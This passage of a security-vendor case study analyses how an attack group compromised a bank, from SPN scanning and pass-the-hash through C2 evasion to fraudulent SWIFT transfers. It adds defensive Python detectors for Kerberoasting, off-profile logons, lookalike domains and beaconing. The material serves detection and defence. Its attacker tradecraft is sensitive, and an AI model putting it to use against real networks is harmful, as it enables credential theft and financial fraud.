Windows Firewall was in use across the Microsoft domain estate with a domain profile set. While this had a default-deny rule for inbound connections, many of the default rules in place allowed access to key Windows ports such as TCP 135/139/445 for file and printer sharing. All servers also had a domain policy set via GPO to have Remote Desktop enabled. This crippled the protection of the host-based firewall and enabled the attackers to gain remote administrative access to most workstations and servers with ease, once they had valid credentials.
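As an added example (not part of the original paper), the Python below implements the Kerberos service-ticket monitoring that the SIEM above lacked, and that would have surfaced the burst of ticket requests described earlier in the domain controller logs. It reads Windows Security event ID 4769 records (Kerberos service ticket requested), drops the machine-account and krbtgt requests that every logon produces, and raises an alert when one account requests tickets for an unusually large number of distinct service accounts inside a rolling time window. It also counts RC4-HMAC tickets (TicketEncryptionType 0x17): those are far cheaper to crack offline than AES ones, which is why offline-cracking tooling asks for them, so a burst of RC4 tickets from a user who normally receives AES tickets is itself a strong signal. The records are constructed; the account names, service names, IP addresses, window length and threshold are assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"     # TicketEncryptionType for RC4-HMAC: crackable far faster than AES
AES256_CTS = "0x12"   # AES256-CTS-HMAC-SHA1-96


def is_noise(event):
    """Tickets every logon produces: machine-account targets, krbtgt, and requests made
    by computer accounts themselves. These are excluded before counting."""
    requester = event["TargetUserName"].split("@")[0]
    service = event["ServiceName"]
    return (requester.endswith("$") or service.endswith("$")
            or service.lower().startswith("krbtgt"))


def detect_kerberoast(events, window=timedelta(minutes=10), min_services=20):
    """Alert when one account requests service tickets for at least min_services
    distinct service accounts inside any rolling window of the given length.

    Returns one alert per offending account, describing its busiest window."""
    by_user = defaultdict(list)
    for ev in events:
        if not is_noise(ev):
            by_user[ev["TargetUserName"]].append(ev)
    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        in_window = Counter()   # service name -> requests currently inside the window
        rc4 = 0
        left = 0
        best = None
        for right, ev in enumerate(evs):
            in_window[ev["ServiceName"]] += 1
            rc4 += ev["TicketEncryptionType"] == RC4_HMAC
            # Slide the left edge forward until the window fits.
            while ev["time"] - evs[left]["time"] > window:
                old = evs[left]
                in_window[old["ServiceName"]] -= 1
                if in_window[old["ServiceName"]] == 0:
                    del in_window[old["ServiceName"]]
                rc4 -= old["TicketEncryptionType"] == RC4_HMAC
                left += 1
            distinct = len(in_window)
            if distinct >= min_services and (best is None or distinct > best["distinct_services"]):
                best = {"user": user, "distinct_services": distinct, "rc4_tickets": rc4,
                        "window_start": evs[left]["time"], "window_end": ev["time"],
                        "source_ip": ev["IpAddress"]}
        if best:
            alerts.append(best)
    return alerts


def build_events():
    """Constructed Security event 4769 records; field names follow the event's XML data."""
    t0 = datetime(2020, 7, 20, 9, 0, 0)
    events = []
    # An ordinary user: a few AES tickets over the morning, mostly to machine accounts.
    for minutes, service in ((0, "EXCH01$"), (5, "svc-sql01"), (90, "FS02$"), (240, "svc-sql01")):
        events.append({"time": t0 + timedelta(minutes=minutes), "TargetUserName": "amiller@ACMEBANK.LOCAL",
                       "ServiceName": service, "TicketEncryptionType": AES256_CTS, "IpAddress": "10.20.4.17"})
    # Computer-account noise.
    for minutes in range(0, 300, 15):
        events.append({"time": t0 + timedelta(minutes=minutes), "TargetUserName": "WS-01042$@ACMEBANK.LOCAL",
                       "ServiceName": "krbtgt", "TicketEncryptionType": AES256_CTS, "IpAddress": "10.20.4.42"})
    # A phished user's workstation working through the SPN scan output: one RC4 ticket
    # per service account, 300 of them in five minutes.
    for i in range(300):
        events.append({"time": t0 + timedelta(hours=2, seconds=i), "TargetUserName": "jsmith@ACMEBANK.LOCAL",
                       "ServiceName": f"svc-app{i:03d}", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.20.4.42"})
    return events


if __name__ == "__main__":
    for alert in detect_kerberoast(build_events()):
        print(f"{alert['user']} from {alert['source_ip']}: {alert['distinct_services']} service accounts, "
              f"{alert['rc4_tickets']} RC4 tickets between {alert['window_start']} and {alert['window_end']}")
```

Counting distinct service accounts rather than raw ticket volume is what keeps the rule quiet for normal users, who request the same few services repeatedly, and loud for an SPN-scan-driven sweep that touches each service account exactly once. The alert carries the source IP so it can be joined to the phishing victim's workstation, which in Acme Bank's case was the same address the attackers later used against the SWIFT environment.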

F-SECURE COUNTERCEPT INSIGHTS

Acme Bank was reliant on traditional security products, such as antivirus to detect payloads and IDS to detect network scanning. The attackers bypassed these controls and neither product provided any security value. Additionally, their account-monitoring activity only covered key production servers and domain controllers and wasn't monitoring for Kerberos-specific attacks.

Once an attacker has a foothold in a network and access to legitimate user credentials, detection can become significantly more difficult as the attacker will often use purely legitimate tools from then on. Two of the most appropriate techniques at this point would have been:

a. Slowing the ability of the attacker to move around the network

b. Anomalous behavior-detection techniques, identifying user accounts or systems operating outside normal usage patterns

At the simplest level, good restriction of management functionality using host-based firewalls can reduce an attacker's network mobility. Obtaining valid credentials is one thing, but without access to management ports on most of the network (such as RPC, SMB, RDP, WinRM, SSH, and so on), it becomes very hard to make effective use of these credentials.


Common group policy controls can effectively prevent remote use of privileged credentials. For example, many accounts that require administrative access on a system might only require that access locally, due to being service accounts or desktop support accounts that enable employees with physical access to particular systems. Use of the ‘Deny access to this computer from the network’ group policy option and other similar controls can be effective in limiting the impact of compromise for certain groups of privileged user accounts. The ‘Restrict NTLM’ group of options can also hinder the use of pass-the-hash attacks for remote access.

For anomalous behavior detection, the basic idea is to use rolling time windows to build profiles of common activity. It should identify the systems from which each user account normally operates interactively, and which systems are normally accessed over the network. Common profiles for the amount of data sent outbound to internet addresses or downloaded from internal resources can also be created.

A standard employee will generally operate their user account at a single workstation and access a common set of services across the network. If that account requests 2,000 Kerberos tickets while the LDAP traffic for the user’s workstation spikes significantly, this falls outside the norm and should be flagged. Likewise, a service account that normally operates interactively on a common set of servers, but is then seen operating from a workstation and accessing systems using network logins, has deviated from its profile.

Effective application of these techniques without overwhelming security teams with false positives requires careful use of machine-learning techniques. The idea is to build accurate models of predictable users and systems, while ruling out the minority of unpredictable ones. Some simple first steps can be applied to cover common scenarios using more traditional approaches. Reviewing accounts requesting high numbers of Kerberos service tickets per day, and adding exceptions for noisy accounts, could easily spot SPN scanning. Likewise, LDAP traffic from the bulk of the network should have relatively tight parameters of data-flow quantity, so a daily review of systems seen making heavy use of LDAP could spot network enumeration.
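The profile-based deviation check and the daily Kerberos service-ticket review described above, as an added example that is not code from the whitepaper: a baseline of earlier logon events is turned into per-account host profiles, and a day’s events are checked against them and against a ticket-count threshold with an exception list. The event IDs (4624 logons with logon type 2 interactive and 3 network, 4769 service-ticket requests), the account and host names, and the 500-ticket threshold are assumptions; the rolling window is simplified to one baseline set and one day under review.

```python
from collections import Counter, defaultdict

# Constructed sample events, not taken from the whitepaper. Each record is a
# normalised Windows security event: 4624 = logon (logon_type 2 interactive,
# 3 network), 4769 = Kerberos service-ticket request. All names are invented.
BASELINE = [  # prior weeks of "normal" activity used to build the profiles
    {"id": 4624, "account": "jsmith", "host": "WS-0142", "logon_type": 2},
    {"id": 4624, "account": "jsmith", "host": "FS-01", "logon_type": 3},
    {"id": 4624, "account": "svc_backup", "host": "SRV-DB01", "logon_type": 2},
    {"id": 4624, "account": "svc_backup", "host": "SRV-DB02", "logon_type": 2},
] + [{"id": 4769, "account": "jsmith", "host": "WS-0142"}] * 12 \
  + [{"id": 4769, "account": "svc_scanner", "host": "SRV-MON01"}] * 900

TODAY = [  # the day under review: a service account appears on a workstation
    {"id": 4624, "account": "jsmith", "host": "WS-0142", "logon_type": 2},
    {"id": 4624, "account": "svc_backup", "host": "WS-0142", "logon_type": 2},
    {"id": 4624, "account": "svc_backup", "host": "SRV-APP07", "logon_type": 3},
] + [{"id": 4769, "account": "jsmith", "host": "WS-0142"}] * 2000 \
  + [{"id": 4769, "account": "svc_scanner", "host": "SRV-MON01"}] * 950


def _kind(event):
    return "interactive" if event["logon_type"] == 2 else "network"


def build_profile(events):
    """Hosts each account normally logs on to, interactively and over the network."""
    profile = defaultdict(lambda: {"interactive": set(), "network": set()})
    for e in events:
        if e["id"] == 4624:
            profile[e["account"]][_kind(e)].add(e["host"])
    return profile


def profile_deviations(profile, events):
    """Logons where the account was never seen on that host in that way."""
    return [(e["account"], _kind(e), e["host"]) for e in events
            if e["id"] == 4624 and e["host"] not in profile[e["account"]][_kind(e)]]


def ticket_outliers(events, threshold=500, exceptions=frozenset()):
    """Accounts requesting more than `threshold` service tickets in the window,
    minus accounts already reviewed and excepted as legitimately noisy."""
    counts = Counter(e["account"] for e in events if e["id"] == 4769)
    return {a: n for a, n in counts.items() if n > threshold and a not in exceptions}


if __name__ == "__main__":
    prof = build_profile(BASELINE)
    print(profile_deviations(prof, TODAY))              # service account off-profile
    print(ticket_outliers(TODAY, exceptions={"svc_scanner"}))  # {'jsmith': 2000}
```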


DATA EXFILTRATION

Laser Tiger used many different IPs and domains throughout its campaign for both phishing sites and command-and-control channels. A number of techniques were used to disguise the sites, including:

• Reusing recently-expired domains that already had good reputations
• Ensuring sites were correctly categorized by web filters as benign
• Using legitimate content within sites
• Impersonating Acme Bank domains
• Using content distribution networks (CDNs) to proxy traffic

The infrastructure used was also changed regularly, with no IP/domain reused between campaigns. Acme Bank often focused on blocking individual IPs/domains, and failed to anticipate the attackers changing infrastructure to evade these controls. The payloads on both workstations and servers were seen communicating with the C2 infrastructure over HTTP, using encrypted payloads.

At various points during the attack, there would have been relatively significant quantities of network traffic – large-scale mining of LDAP for information and SPN scanning would require unusually high levels of LDAP traffic between compromised workstations and domain controllers. Meanwhile, interactive RDP sessions over long periods, and the theft of large data sets along the way, would have resulted in far more internet-bound upload traffic than usual from the compromised systems. However, Acme Bank didn’t have good net-flow data feeding into its SIEM, or analysis techniques that would have been able to spot deviations from normal traffic patterns.


F-SECURE COUNTERCEPT INSIGHTS


Monitoring for anomalous traffic flows can be particularly challenging when facing an advanced attacker. Traditional approaches, such as using technical threat intelligence involving ‘known-bad’ domains and IP addresses, are ineffective, as the attackers will simply use new infrastructure that has no history of malicious activity. Reputation-based analysis is a step forward, but ineffective when the attackers use addresses with a positive reputation, as in this case and likely in any targeted attack conducted by a skilled group.

Domain history could have provided some interesting findings, as some of the phishing domains had likely been created only weeks or months earlier. Analysis of DNS data for domains containing the word ‘Acme’, or unfamiliar domains similar to real domains, would also have highlighted those used by Laser Tiger. Careful analysis of registration dates, registrars, and other attributes associated with the domains seen in use for the originally reported phishing emails and implant payloads might also have provided leads. These could be correlated against all domains seen in Acme Bank’s logs to help construct a shortlist of other potentially malicious domains.
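The DNS-data review described above, as an added example that is not code from the whitepaper: queried domains that are not the bank’s own are flagged when they contain the brand string, sit within a small edit distance of a legitimate domain, or were registered recently. The query log, the legitimate-domain list, the registration ages and the thresholds are constructed assumptions; only the ‘acme-survey.com’ pattern comes from the whitepaper’s timeline, and the two-label ‘registrable part’ is a deliberate simplification in place of a public-suffix list.

```python
# Constructed DNS query log and invented registration data, not from the
# whitepaper (apart from the 'acme-survey.com' pattern its timeline mentions).
LEGIT_DOMAINS = {"acmebank.com", "login.acmebank.com"}
QUERIED = ["acmebank.com", "login.acmebank.com", "acme-survey.com",
           "acmebank-support.net", "acrnebank.com", "news.example.org"]
REGISTRATION_AGE_DAYS = {"acmebank.com": 6200, "acme-survey.com": 21,
                         "acmebank-support.net": 40, "acrnebank.com": 9,
                         "news.example.org": 3000}
BRAND = "acme"


def registrable(domain):
    """Crude 'registrable part': the last two labels (no public-suffix list here)."""
    return ".".join(domain.lower().split(".")[-2:])


def edit_distance(a, b):
    """Levenshtein distance via the standard dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def suspicious_domains(queried, legit, ages, max_age_days=90, max_distance=2):
    """Return {domain: [reasons]} for queried domains that are not ours but
    contain the brand, look like one of our domains, or were registered recently."""
    legit_reg = {registrable(d) for d in legit}
    legit_labels = {r.split(".")[0] for r in legit_reg}
    findings = {}
    for d in sorted(set(queried)):
        if d in legit or registrable(d) in legit_reg:
            continue  # our own domains and their subdomains are not lookalikes
        reasons = []
        if BRAND in d:
            reasons.append("contains brand string")
        label = registrable(d).split(".")[0]
        if any(edit_distance(label, l) <= max_distance for l in legit_labels):
            reasons.append("lookalike of a legitimate domain")
        age = ages.get(d)  # unknown age is not treated as evidence either way
        if age is not None and age <= max_age_days:
            reasons.append("registered within %d days" % max_age_days)
        if reasons:
            findings[d] = reasons
    return findings
```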

Detection of anomalous data flows relating to key services and outbound traffic was discussed previously, but there are other techniques that can be applied specifically to identify communications channels. Similar learning models can be applied to the standard user agents used by each system. This will help identify new user agents that are potentially related to an implant, while statistical techniques can identify long-running, regular communication with outside domains that is indicative of ‘beaconing’ behavior. These techniques are false-positive prone when used in isolation. However, when combined with anomaly-detection techniques, and enriched with information on domains (such as global popularity), they can yield strong defensive results. A small number of systems that start beaconing to a previously unseen domain can be differentiated from a popular Google domain related to Google Chat that has been seen on the network for many years.
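The beaconing statistic and the domain enrichment described above, as an added example that is not code from the whitepaper: request intervals for each (host, domain) pair are scored by their coefficient of variation (standard deviation divided by mean), and the regular pairs are then filtered by how long the domain has been seen on the network and by how many hosts contact it. The proxy records, host and domain names, thresholds and the enrichment table are all constructed assumptions.

```python
import statistics
from collections import defaultdict
from itertools import accumulate


# Constructed web-proxy records, not from the whitepaper:
# (timestamp_seconds, client_host, destination_domain). Names are invented.
def _regular(host, domain, start, n, period, jitter):
    # a check-in every `period` seconds with a small repeating jitter
    return [(start + i * period + (i % 3) * jitter, host, domain) for i in range(n)]


IRREGULAR_GAPS = [5, 60, 900, 30, 2000, 15, 450, 120] * 3  # ordinary browsing
PROXY_LOG = (
    _regular("WS-0142", "cdn-assets-update.example", 0, 48, 300, 2)   # implant check-in
    + _regular("WS-0142", "chat.example-popular.com", 7, 48, 300, 5)  # chat keep-alive
    + _regular("WS-0201", "chat.example-popular.com", 3, 48, 300, 5)
    + [(t, "WS-0201", "news.example.org") for t in accumulate(IRREGULAR_GAPS)]
)
# Enrichment learnt over a long window (constructed): days the domain has been
# seen on this network and how many distinct hosts contact it.
DOMAIN_INFO = {"chat.example-popular.com": {"days_seen": 1500, "hosts": 1800},
               "news.example.org": {"days_seen": 400, "hosts": 300}}


def beacon_candidates(log, min_requests=20, max_cv=0.15):
    """(host, domain) pairs whose request intervals are unusually regular."""
    by_pair = defaultdict(list)
    for ts, host, domain in log:
        by_pair[(host, domain)].append(ts)
    found = {}
    for pair, times in by_pair.items():
        if len(times) < min_requests:
            continue  # too few requests to call anything "long-running"
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        cv = statistics.pstdev(gaps) / statistics.mean(gaps)
        if cv <= max_cv:
            found[pair] = round(cv, 3)
    return found


def prioritise(candidates, info, min_days=30, min_hosts=50):
    """Drop regular traffic to domains long established and widely used on the
    network; keep what is new here or seen from only a few systems."""
    keep = {}
    for (host, domain), cv in candidates.items():
        seen = info.get(domain, {"days_seen": 0, "hosts": 0})
        if seen["days_seen"] < min_days or seen["hosts"] < min_hosts:
            keep[(host, domain)] = cv
    return keep
```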


ACTIONS ON OBJECTIVES

Once Laser Tiger compromised a SWIFT administrator’s workstation and privileged user account, it had unrestricted access to the SWIFT environment. The earliest timestamps indicate the attackers had access to the payment systems from early July, when they presumably began gathering information on the payment process. They are suspected of injecting transfer information into the payment files that were held on an FTP server, before being retrieved by the SWIFT application. Unscheduled server restarts of critical systems were seen shortly after the unusual SWIFT transfers took place. The attackers are thought to have performed these restarts to remove forensic artefacts from memory.

One day prior to the actual fraudulent SWIFT transactions, a Distributed Denial of Service (DDoS) attack was launched against Acme Bank’s main corporate website, taking it offline for eight hours. The attack lasted for around 24 hours, making it a key focus for the bank’s security team. Though no link can be proved, the timing of the attack – just before the SWIFT transfers – and the fact that no group claimed responsibility for the DDoS or demanded ransom suggests it was a diversionary tactic by Laser Tiger. Only on discovering the fraudulent transactions did Acme Bank become aware of the full extent of the compromise and launch a dedicated incident response process.


TIMELINE OF ATTACK

• 05/01/16 – First phishing attacks launched with a Microsoft Office macro payload
• 06/01/16 – User reports suspicious email to security team. Security team confirms email is malicious and begins investigation
• 07/01/16 – Command-and-control channel is confirmed and blocked at the web proxy
• 09/01/16 – Workstations are replaced and passwords reset for all users who were confirmed to have received the same email
• 17/02/16 – Large-scale phishing campaign focused on credentials theft using ‘acme-survey.com’
• 18/02/16 – User reports suspicious email and credentials are reset for users who accessed the site
• 08/04/16 – Phishing emails referencing a fake support site dropping an HTA payload are delivered
• 11/04/16 – Phishing campaign targets a smaller number of users with a different HTA payload
• 10/05/16 – First use of compromised domain service account
• 13/05/16 – SWIFT admin user account used to illegitimately access the SWIFT environment
• 22/07/16 – Distributed Denial of Service takes down Acme Bank website for 8 hours
• 23/07/16 – SWIFT transfers are made to overseas accounts
• 25/07/16 – Bank discovers fraudulent transaction and begins incident response


CONCLUSIONS

This compromise is an example of how today’s cyber attackers continually perform reconnaissance and escalation of access over a period of months or longer to achieve their goals. Prevention and detection tactics can slow the attacker, but whether they come to a standstill depends on the skill and persistence of the attacking and defending teams.

The Laser Tiger group demonstrated a very high level of operational security in using in-memory techniques and custom payloads, relying on legitimate Windows functionality, targeting specific users, and maintaining/changing a comprehensive set of C2 channels. The Acme Bank security team was unprepared to handle such an adversary and, as a result, the organization suffered a significant financial loss.

KEY TAKEAWAYS:

• Defense informs offense, offense informs defense. Understanding the techniques used by the threat allows you to prevent and detect more effectively
• Both prevention and detection should be used to slow a determined attacker
• Your network needs to be continually defended, requiring a skilled team of threat hunters
• Real-time, continuous monitoring of endpoints is essential – workstations are the front line, and the most common entry point into your network
• Response times matter. Although real-time detection is unlikely, spotting an attacker in the first hours or days of an attack is a huge win, especially considering compromises can last weeks, months, or even years
• Many traditional security controls aren’t capable of preventing or detecting modern offensive techniques used in targeted attacks. Modern approaches are needed, and targeted attack simulation exercises are the only way to truly test your defenses

STEPS TOWARDS SECURITY:

• Conduct a static analysis of all email attachments
• Use more generic indicators to triage attachments for manual analysis
• Ensure your EDR toolsets can gather as much persistence data as possible
• Review accounts requesting high numbers of Kerberos tickets
• Regularly carry out targeted attack simulation exercises
